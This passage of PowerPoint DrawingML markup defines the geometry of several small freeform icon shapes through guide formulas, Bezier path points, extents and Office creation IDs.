                  <a:gd name="T78" fmla="*/ 66 w 115"/>
                  <a:gd name="T79" fmla="*/ 98 h 112"/>
                  <a:gd name="T80" fmla="*/ 47 w 115"/>
                  <a:gd name="T81" fmla="*/ 77 h 112"/>
                  <a:gd name="T82" fmla="*/ 96 w 115"/>
                  <a:gd name="T83" fmla="*/ 53 h 112"/>
                  <a:gd name="T84" fmla="*/ 95 w 115"/>
                  <a:gd name="T85" fmla="*/ 53 h 112"/>
                  <a:gd name="T86" fmla="*/ 93 w 115"/>
                  <a:gd name="T87" fmla="*/ 51 h 112"/>
                  <a:gd name="T88" fmla="*/ 89 w 115"/>
                  <a:gd name="T89" fmla="*/ 42 h 112"/>
                  <a:gd name="T90" fmla="*/ 88 w 115"/>
                  <a:gd name="T91" fmla="*/ 32 h 112"/>
                  <a:gd name="T92" fmla="*/ 89 w 115"/>
                  <a:gd name="T93" fmla="*/ 29 h 112"/>
                  <a:gd name="T94" fmla="*/ 90 w 115"/>
                  <a:gd name="T95" fmla="*/ 28 h 112"/>
                  <a:gd name="T96" fmla="*/ 91 w 115"/>
                  <a:gd name="T97" fmla="*/ 29 h 112"/>
                  <a:gd name="T98" fmla="*/ 93 w 115"/>
                  <a:gd name="T99" fmla="*/ 31 h 112"/>
                  <a:gd name="T100" fmla="*/ 97 w 115"/>
                  <a:gd name="T101" fmla="*/ 40 h 112"/>
                  <a:gd name="T102" fmla="*/ 98 w 115"/>
                  <a:gd name="T103" fmla="*/ 49 h 112"/>
                  <a:gd name="T104" fmla="*/ 97 w 115"/>
                  <a:gd name="T105" fmla="*/ 52 h 112"/>
                  <a:gd name="T106" fmla="*/ 96 w 115"/>
                  <a:gd name="T107" fmla="*/ 5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5" h="112">
                    <a:moveTo>
                      <a:pt x="110" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="15"/>
                      <a:pt x="93" y="0"/>
                      <a:pt x="86" y="1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4"/>
                      <a:pt x="60" y="25"/>
                      <a:pt x="32" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="44"/>
                      <a:pt x="34" y="50"/>
                      <a:pt x="36" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="63"/>
                      <a:pt x="39" y="68"/>
                      <a:pt x="42" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="98" y="81"/>
                      <a:pt x="98" y="81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06" y="78"/>
                      <a:pt x="106" y="79"/>
                      <a:pt x="106" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="76"/>
                      <a:pt x="115" y="57"/>
                      <a:pt x="110" y="36"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="102" y="73"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="74"/>
                      <a:pt x="99" y="73"/>
                      <a:pt x="99" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="71"/>
                      <a:pt x="95" y="69"/>
                      <a:pt x="93" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="61"/>
                      <a:pt x="85" y="53"/>
                      <a:pt x="83" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="34"/>
                      <a:pt x="79" y="25"/>
                      <a:pt x="80" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="15"/>
                      <a:pt x="81" y="12"/>
                      <a:pt x="82" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="10"/>
                      <a:pt x="83" y="8"/>
                      <a:pt x="84" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="8"/>
                      <a:pt x="87" y="9"/>
                      <a:pt x="87" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="10"/>
                      <a:pt x="91" y="12"/>
                      <a:pt x="93" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="20"/>
                      <a:pt x="101" y="29"/>
                      <a:pt x="103" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="47"/>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105" y="69"/>
                      <a:pt x="104" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="72"/>
                      <a:pt x="103" y="73"/>
                      <a:pt x="102" y="73"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="28" y="58"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="53"/>
                      <a:pt x="26" y="47"/>
                      <a:pt x="25" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="44"/>
                      <a:pt x="16" y="46"/>
                      <a:pt x="11" y="47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11" y="78"/>
                      <a:pt x="11" y="78"/>
                      <a:pt x="11" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="78"/>
                      <a:pt x="11" y="78"/>
                      <a:pt x="19" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="75"/>
                      <a:pt x="28" y="74"/>
                      <a:pt x="34" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="69"/>
                      <a:pt x="30" y="64"/>
                      <a:pt x="28" y="58"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="47" y="77"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="78"/>
                      <a:pt x="32" y="78"/>
                      <a:pt x="32" y="78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51" y="112"/>
                      <a:pt x="53" y="112"/>
                      <a:pt x="54" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="102"/>
                      <a:pt x="66" y="102"/>
                      <a:pt x="66" y="102"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="101"/>
                      <a:pt x="67" y="99"/>
                      <a:pt x="66" y="98"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="47" y="77"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="96" y="53"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="53"/>
                      <a:pt x="95" y="53"/>
                      <a:pt x="95" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="53"/>
                      <a:pt x="94" y="52"/>
                      <a:pt x="93" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="90" y="45"/>
                      <a:pt x="89" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="38"/>
                      <a:pt x="88" y="35"/>
                      <a:pt x="88" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="31"/>
                      <a:pt x="88" y="30"/>
                      <a:pt x="89" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="29"/>
                      <a:pt x="89" y="28"/>
                      <a:pt x="90" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="28"/>
                      <a:pt x="90" y="28"/>
                      <a:pt x="91" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="29"/>
                      <a:pt x="92" y="30"/>
                      <a:pt x="93" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="33"/>
                      <a:pt x="96" y="36"/>
                      <a:pt x="97" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="43"/>
                      <a:pt x="98" y="47"/>
                      <a:pt x="98" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="51"/>
                      <a:pt x="98" y="52"/>
                      <a:pt x="97" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="53"/>
                      <a:pt x="97" y="53"/>
                      <a:pt x="96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4" name="Freeform 216">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B55CD80-3723-4465-9666-39A2EE8C39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20971" y="6157383"/>
                <a:ext cx="334704" cy="336661"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 100 w 105"/>
                  <a:gd name="T1" fmla="*/ 29 h 105"/>
                  <a:gd name="T2" fmla="*/ 71 w 105"/>
                  <a:gd name="T3" fmla="*/ 26 h 105"/>
                  <a:gd name="T4" fmla="*/ 88 w 105"/>
                  <a:gd name="T5" fmla="*/ 9 h 105"/>
                  <a:gd name="T6" fmla="*/ 82 w 105"/>
                  <a:gd name="T7" fmla="*/ 3 h 105"/>
                  <a:gd name="T8" fmla="*/ 59 w 105"/>
                  <a:gd name="T9" fmla="*/ 26 h 105"/>
                  <a:gd name="T10" fmla="*/ 52 w 105"/>
                  <a:gd name="T11" fmla="*/ 26 h 105"/>
                  <a:gd name="T12" fmla="*/ 52 w 105"/>
                  <a:gd name="T13" fmla="*/ 26 h 105"/>
                  <a:gd name="T14" fmla="*/ 26 w 105"/>
                  <a:gd name="T15" fmla="*/ 0 h 105"/>
                  <a:gd name="T16" fmla="*/ 19 w 105"/>
                  <a:gd name="T17" fmla="*/ 6 h 105"/>
                  <a:gd name="T18" fmla="*/ 39 w 105"/>
                  <a:gd name="T19" fmla="*/ 26 h 105"/>
                  <a:gd name="T20" fmla="*/ 4 w 105"/>
                  <a:gd name="T21" fmla="*/ 29 h 105"/>
                  <a:gd name="T22" fmla="*/ 0 w 105"/>
                  <a:gd name="T23" fmla="*/ 65 h 105"/>
                  <a:gd name="T24" fmla="*/ 4 w 105"/>
                  <a:gd name="T25" fmla="*/ 101 h 105"/>
                  <a:gd name="T26" fmla="*/ 52 w 105"/>
                  <a:gd name="T27" fmla="*/ 105 h 105"/>
                  <a:gd name="T28" fmla="*/ 100 w 105"/>
                  <a:gd name="T29" fmla="*/ 101 h 105"/>
                  <a:gd name="T30" fmla="*/ 105 w 105"/>
                  <a:gd name="T31" fmla="*/ 65 h 105"/>
                  <a:gd name="T32" fmla="*/ 100 w 105"/>
                  <a:gd name="T33" fmla="*/ 29 h 105"/>
                  <a:gd name="T34" fmla="*/ 88 w 105"/>
                  <a:gd name="T35" fmla="*/ 89 h 105"/>
                  <a:gd name="T36" fmla="*/ 52 w 105"/>
                  <a:gd name="T37" fmla="*/ 92 h 105"/>
                  <a:gd name="T38" fmla="*/ 16 w 105"/>
                  <a:gd name="T39" fmla="*/ 89 h 105"/>
                  <a:gd name="T40" fmla="*/ 13 w 105"/>
                  <a:gd name="T41" fmla="*/ 65 h 105"/>
                  <a:gd name="T42" fmla="*/ 16 w 105"/>
                  <a:gd name="T43" fmla="*/ 41 h 105"/>
                  <a:gd name="T44" fmla="*/ 52 w 105"/>
                  <a:gd name="T45" fmla="*/ 39 h 105"/>
                  <a:gd name="T46" fmla="*/ 88 w 105"/>
                  <a:gd name="T47" fmla="*/ 41 h 105"/>
                  <a:gd name="T48" fmla="*/ 92 w 105"/>
                  <a:gd name="T49" fmla="*/ 65 h 105"/>
                  <a:gd name="T50" fmla="*/ 88 w 105"/>
                  <a:gd name="T51" fmla="*/ 89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" h="105">
                    <a:moveTo>
                      <a:pt x="100" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="28"/>
                      <a:pt x="82" y="27"/>
                      <a:pt x="71" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="9"/>
                      <a:pt x="88" y="9"/>
                      <a:pt x="88" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="3"/>
                      <a:pt x="82" y="3"/>
                      <a:pt x="82" y="3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7" y="26"/>
                      <a:pt x="54" y="26"/>
                      <a:pt x="52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39" y="26"/>
                      <a:pt x="39" y="26"/>
                      <a:pt x="39" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="27"/>
                      <a:pt x="15" y="28"/>
                      <a:pt x="4" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="40"/>
                      <a:pt x="0" y="52"/>
                      <a:pt x="0" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="78"/>
                      <a:pt x="1" y="90"/>
                      <a:pt x="4" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="104"/>
                      <a:pt x="35" y="105"/>
                      <a:pt x="52" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="105"/>
                      <a:pt x="86" y="104"/>
                      <a:pt x="100" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="90"/>
                      <a:pt x="105" y="78"/>
                      <a:pt x="105" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="52"/>
                      <a:pt x="103" y="40"/>
                      <a:pt x="100" y="29"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="88" y="89"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="91"/>
                      <a:pt x="65" y="92"/>
                      <a:pt x="52" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="92"/>
                      <a:pt x="27" y="91"/>
                      <a:pt x="16" y="89"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="82"/>
                      <a:pt x="13" y="74"/>
                      <a:pt x="13" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="57"/>
                      <a:pt x="14" y="49"/>
                      <a:pt x="16" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="40"/>
                      <a:pt x="39" y="39"/>
                      <a:pt x="52" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="39"/>
                      <a:pt x="77" y="40"/>
                      <a:pt x="88" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="49"/>
                      <a:pt x="92" y="57"/>
                      <a:pt x="92" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="74"/>
                      <a:pt x="90" y="82"/>
                      <a:pt x="88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5" name="Freeform 217">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0674A813-C307-4F7D-97BC-53D6CC977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72038" y="6560592"/>
                <a:ext cx="409082" cy="230965"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 50 h 72"/>
                  <a:gd name="T2" fmla="*/ 112 w 128"/>
                  <a:gd name="T3" fmla="*/ 29 h 72"/>
                  <a:gd name="T4" fmla="*/ 82 w 128"/>
                  <a:gd name="T5" fmla="*/ 0 h 72"/>
                  <a:gd name="T6" fmla="*/ 58 w 128"/>
                  <a:gd name="T7" fmla="*/ 11 h 72"/>
                  <a:gd name="T8" fmla="*/ 45 w 128"/>
                  <a:gd name="T9" fmla="*/ 4 h 72"/>
                  <a:gd name="T10" fmla="*/ 29 w 128"/>
                  <a:gd name="T11" fmla="*/ 21 h 72"/>
                  <a:gd name="T12" fmla="*/ 29 w 128"/>
                  <a:gd name="T13" fmla="*/ 23 h 72"/>
                  <a:gd name="T14" fmla="*/ 24 w 128"/>
                  <a:gd name="T15" fmla="*/ 23 h 72"/>
                  <a:gd name="T16" fmla="*/ 0 w 128"/>
                  <a:gd name="T17" fmla="*/ 47 h 72"/>
                  <a:gd name="T18" fmla="*/ 24 w 128"/>
                  <a:gd name="T19" fmla="*/ 72 h 72"/>
                  <a:gd name="T20" fmla="*/ 106 w 128"/>
                  <a:gd name="T21" fmla="*/ 72 h 72"/>
                  <a:gd name="T22" fmla="*/ 106 w 128"/>
                  <a:gd name="T23" fmla="*/ 72 h 72"/>
                  <a:gd name="T24" fmla="*/ 128 w 128"/>
                  <a:gd name="T25" fmla="*/ 5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72">
                    <a:moveTo>
                      <a:pt x="128" y="50"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="39"/>
                      <a:pt x="121" y="31"/>
                      <a:pt x="112" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="12"/>
                      <a:pt x="98" y="0"/>
                      <a:pt x="82" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="0"/>
                      <a:pt x="64" y="4"/>
                      <a:pt x="58" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="7"/>
                      <a:pt x="51" y="4"/>
                      <a:pt x="45" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="4"/>
                      <a:pt x="29" y="12"/>
                      <a:pt x="29" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="22"/>
                      <a:pt x="29" y="23"/>
                      <a:pt x="29" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="23"/>
                      <a:pt x="26" y="23"/>
                      <a:pt x="24" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="23"/>
                      <a:pt x="0" y="34"/>
                      <a:pt x="0" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="61"/>
                      <a:pt x="11" y="72"/>
                      <a:pt x="24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06" y="72"/>
                      <a:pt x="106" y="72"/>
                      <a:pt x="106" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="71"/>
                      <a:pt x="128" y="62"/>
                      <a:pt x="128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6" name="Freeform 218">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A991779-7F35-4831-AB8F-B2B8C8E4F1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992317" y="6560592"/>
                <a:ext cx="281855" cy="230965"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 88"/>
                  <a:gd name="T1" fmla="*/ 0 h 72"/>
                  <a:gd name="T2" fmla="*/ 0 w 88"/>
                  <a:gd name="T3" fmla="*/ 72 h 72"/>
                  <a:gd name="T4" fmla="*/ 88 w 88"/>
                  <a:gd name="T5" fmla="*/ 72 h 72"/>
                  <a:gd name="T6" fmla="*/ 88 w 88"/>
                  <a:gd name="T7" fmla="*/ 0 h 72"/>
                  <a:gd name="T8" fmla="*/ 0 w 88"/>
                  <a:gd name="T9" fmla="*/ 0 h 72"/>
                  <a:gd name="T10" fmla="*/ 83 w 88"/>
                  <a:gd name="T11" fmla="*/ 66 h 72"/>
                  <a:gd name="T12" fmla="*/ 5 w 88"/>
                  <a:gd name="T13" fmla="*/ 66 h 72"/>
                  <a:gd name="T14" fmla="*/ 5 w 88"/>
                  <a:gd name="T15" fmla="*/ 5 h 72"/>
                  <a:gd name="T16" fmla="*/ 83 w 88"/>
                  <a:gd name="T17" fmla="*/ 5 h 72"/>
                  <a:gd name="T18" fmla="*/ 83 w 88"/>
                  <a:gd name="T19" fmla="*/ 66 h 72"/>
                  <a:gd name="T20" fmla="*/ 61 w 88"/>
                  <a:gd name="T21" fmla="*/ 19 h 72"/>
                  <a:gd name="T22" fmla="*/ 69 w 88"/>
                  <a:gd name="T23" fmla="*/ 27 h 72"/>
                  <a:gd name="T24" fmla="*/ 77 w 88"/>
                  <a:gd name="T25" fmla="*/ 19 h 72"/>
                  <a:gd name="T26" fmla="*/ 69 w 88"/>
                  <a:gd name="T27" fmla="*/ 11 h 72"/>
                  <a:gd name="T28" fmla="*/ 61 w 88"/>
                  <a:gd name="T29" fmla="*/ 19 h 72"/>
                  <a:gd name="T30" fmla="*/ 77 w 88"/>
                  <a:gd name="T31" fmla="*/ 60 h 72"/>
                  <a:gd name="T32" fmla="*/ 11 w 88"/>
                  <a:gd name="T33" fmla="*/ 60 h 72"/>
                  <a:gd name="T34" fmla="*/ 27 w 88"/>
                  <a:gd name="T35" fmla="*/ 16 h 72"/>
                  <a:gd name="T36" fmla="*/ 50 w 88"/>
                  <a:gd name="T37" fmla="*/ 44 h 72"/>
                  <a:gd name="T38" fmla="*/ 61 w 88"/>
                  <a:gd name="T39" fmla="*/ 36 h 72"/>
                  <a:gd name="T40" fmla="*/ 77 w 88"/>
                  <a:gd name="T4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72">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="72"/>
                      <a:pt x="0" y="72"/>
                      <a:pt x="0" y="72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0"/>
                      <a:pt x="88" y="0"/>
                      <a:pt x="88" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="83" y="66"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="66"/>
                      <a:pt x="5" y="66"/>
                      <a:pt x="5" y="6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83" y="5"/>
                      <a:pt x="83" y="5"/>
                      <a:pt x="83" y="5"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="83" y="66"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="61" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="24"/>
                      <a:pt x="64" y="27"/>
                      <a:pt x="69" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="27"/>
                      <a:pt x="77" y="24"/>
                      <a:pt x="77" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="14"/>
                      <a:pt x="74" y="11"/>
                      <a:pt x="69" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="11"/>
                      <a:pt x="61" y="14"/>
                      <a:pt x="61" y="19"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="77" y="60"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="60"/>
                      <a:pt x="11" y="60"/>
                      <a:pt x="11" y="60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61" y="36"/>
                      <a:pt x="61" y="36"/>
                      <a:pt x="61" y="36"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="77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7" name="Freeform 219">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB5C46C-AA58-46A8-B9CA-12EEDCA49A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83234" y="6505787"/>
                <a:ext cx="272069" cy="275983"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 85"/>
                  <a:gd name="T1" fmla="*/ 59 h 86"/>
                  <a:gd name="T2" fmla="*/ 82 w 85"/>
                  <a:gd name="T3" fmla="*/ 47 h 86"/>
                  <a:gd name="T4" fmla="*/ 82 w 85"/>
                  <a:gd name="T5" fmla="*/ 59 h 86"/>
                  <a:gd name="T6" fmla="*/ 66 w 85"/>
                  <a:gd name="T7" fmla="*/ 67 h 86"/>
                  <a:gd name="T8" fmla="*/ 59 w 85"/>
                  <a:gd name="T9" fmla="*/ 84 h 86"/>
                  <a:gd name="T10" fmla="*/ 47 w 85"/>
                  <a:gd name="T11" fmla="*/ 84 h 86"/>
                  <a:gd name="T12" fmla="*/ 57 w 85"/>
                  <a:gd name="T13" fmla="*/ 59 h 86"/>
                  <a:gd name="T14" fmla="*/ 24 w 85"/>
                  <a:gd name="T15" fmla="*/ 85 h 86"/>
                  <a:gd name="T16" fmla="*/ 39 w 85"/>
                  <a:gd name="T17" fmla="*/ 42 h 86"/>
                  <a:gd name="T18" fmla="*/ 81 w 85"/>
                  <a:gd name="T19" fmla="*/ 23 h 86"/>
                  <a:gd name="T20" fmla="*/ 81 w 85"/>
                  <a:gd name="T21" fmla="*/ 35 h 86"/>
                  <a:gd name="T22" fmla="*/ 81 w 85"/>
                  <a:gd name="T23" fmla="*/ 35 h 86"/>
                  <a:gd name="T24" fmla="*/ 48 w 85"/>
                  <a:gd name="T25" fmla="*/ 51 h 86"/>
                  <a:gd name="T26" fmla="*/ 36 w 85"/>
                  <a:gd name="T27" fmla="*/ 85 h 86"/>
                  <a:gd name="T28" fmla="*/ 24 w 85"/>
                  <a:gd name="T29" fmla="*/ 85 h 86"/>
                  <a:gd name="T30" fmla="*/ 49 w 85"/>
                  <a:gd name="T31" fmla="*/ 7 h 86"/>
                  <a:gd name="T32" fmla="*/ 80 w 85"/>
                  <a:gd name="T33" fmla="*/ 0 h 86"/>
                  <a:gd name="T34" fmla="*/ 80 w 85"/>
                  <a:gd name="T35" fmla="*/ 0 h 86"/>
                  <a:gd name="T36" fmla="*/ 80 w 85"/>
                  <a:gd name="T37" fmla="*/ 12 h 86"/>
                  <a:gd name="T38" fmla="*/ 31 w 85"/>
                  <a:gd name="T39" fmla="*/ 34 h 86"/>
                  <a:gd name="T40" fmla="*/ 12 w 85"/>
                  <a:gd name="T41" fmla="*/ 86 h 86"/>
                  <a:gd name="T42" fmla="*/ 0 w 85"/>
                  <a:gd name="T43" fmla="*/ 86 h 86"/>
                  <a:gd name="T44" fmla="*/ 5 w 85"/>
                  <a:gd name="T45" fmla="*/ 55 h 86"/>
                  <a:gd name="T46" fmla="*/ 22 w 85"/>
                  <a:gd name="T47" fmla="*/ 26 h 86"/>
                  <a:gd name="T48" fmla="*/ 49 w 85"/>
                  <a:gd name="T49" fmla="*/ 7 h 86"/>
                  <a:gd name="T50" fmla="*/ 75 w 85"/>
                  <a:gd name="T51" fmla="*/ 83 h 86"/>
                  <a:gd name="T52" fmla="*/ 83 w 85"/>
                  <a:gd name="T53" fmla="*/ 83 h 86"/>
                  <a:gd name="T54" fmla="*/ 83 w 85"/>
                  <a:gd name="T55" fmla="*/ 74 h 86"/>
                  <a:gd name="T56" fmla="*/ 74 w 85"/>
                  <a:gd name="T57" fmla="*/ 75 h 86"/>
                  <a:gd name="T58" fmla="*/ 75 w 85"/>
                  <a:gd name="T59" fmla="*/ 8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5" h="86">
                    <a:moveTo>
                      <a:pt x="57" y="59"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="51"/>
                      <a:pt x="73" y="48"/>
                      <a:pt x="82" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="59"/>
                      <a:pt x="82" y="59"/>
                      <a:pt x="82" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="59"/>
                      <a:pt x="70" y="62"/>
                      <a:pt x="66" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="71"/>
                      <a:pt x="59" y="78"/>
                      <a:pt x="59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75"/>
                      <a:pt x="50" y="66"/>
                      <a:pt x="57" y="59"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="24" y="85"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="69"/>
                      <a:pt x="29" y="54"/>
                      <a:pt x="39" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="31"/>
                      <a:pt x="65" y="24"/>
                      <a:pt x="81" y="23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69" y="36"/>
                      <a:pt x="57" y="41"/>
                      <a:pt x="48" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="60"/>
                      <a:pt x="35" y="72"/>
                      <a:pt x="36" y="85"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24" y="85"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="49" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="3"/>
                      <a:pt x="69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61" y="12"/>
                      <a:pt x="44" y="20"/>
                      <a:pt x="31" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="48"/>
                      <a:pt x="11" y="67"/>
                      <a:pt x="12" y="86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75"/>
                      <a:pt x="1" y="65"/>
                      <a:pt x="5" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="44"/>
                      <a:pt x="14" y="35"/>
                      <a:pt x="22" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
